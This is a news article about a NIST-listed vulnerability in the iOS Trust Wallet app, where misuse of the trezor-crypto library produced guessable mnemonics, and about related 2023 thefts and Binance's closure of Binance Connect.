US agency flags security flaw in Binance self-custody wallet

The US National Institute of Standards and Technology (NIST) has pinpointed a critical vulnerability in the iOS version of the “Binance Trust Wallet.”

The flaw was detailed in the Common Vulnerabilities and Exposures (CVE) database on February 8, which means it presents a significant risk that could enable attackers to siphon off funds from unsuspecting users’ digital wallets.

This vulnerability arises from a misuse of the trezor-crypto library within the Trust Wallet app. Specifically, the mnemonic words — a series of words generated to provide access to cryptocurrencies — are created in a manner that might only be secure at the entropy source, essentially the starting point for data generation. The CVE database entry reveals that this security gap has already been exploited, with incidents in July 2023 showing attackers could guess these mnemonic words, leading to unauthorized access and financial losses.

NIST, which is a key agency within the U.S. Department of Commerce tasked with shaping technology and cybersecurity standards, said its ongoing investigation seeks to assess the real-world impact of this flaw. The severity of the vulnerability will eventually be scored on a scale from 0 to 10, reflecting its potential danger to users.

The backdrop to this issue is a series of cyber incidents faced by Trust Wallet in 2023, cumulating in losses exceeding $4 million. Trust Wallet, which was acquired by the cryptocurrency giant Binance in 2018, has since seen launch the exchange’s own Web3 wallet.

An independent probe by Milk Sad has shed additional light on the matter, identifying over 6,572 unique wallet mnemonics at risk. This investigation shows the use of unsafe functions within the trezor-crypto library, not intended for production use, that led to the creation of vulnerable wallets. These wallets are believed to be linked to the so-called Milk Sad thefts.

In response to the news, a Binance spokesperson clarified that Trust Wallet now operates as a separate legal entity, distinct from the group. The move came as the exchange discontinued its fiat-to-crypto payment platform, Binance Connect, just one year after its official launch in March 2022.

Binance Connect was initially introduced to facilitate crypto payments for merchants, aiming to assist businesses in becoming “crypto-ready.” The service provided support for over 50 cryptocurrencies and accepted major payment methods, including Visa and Mastercard. It served as a fiat-to-crypto payments gateway, bridging the gap between crypto and traditional financial systems, as well as the fiat-to-crypto on-ramp for the exchange’s self-custody Trust Wallet.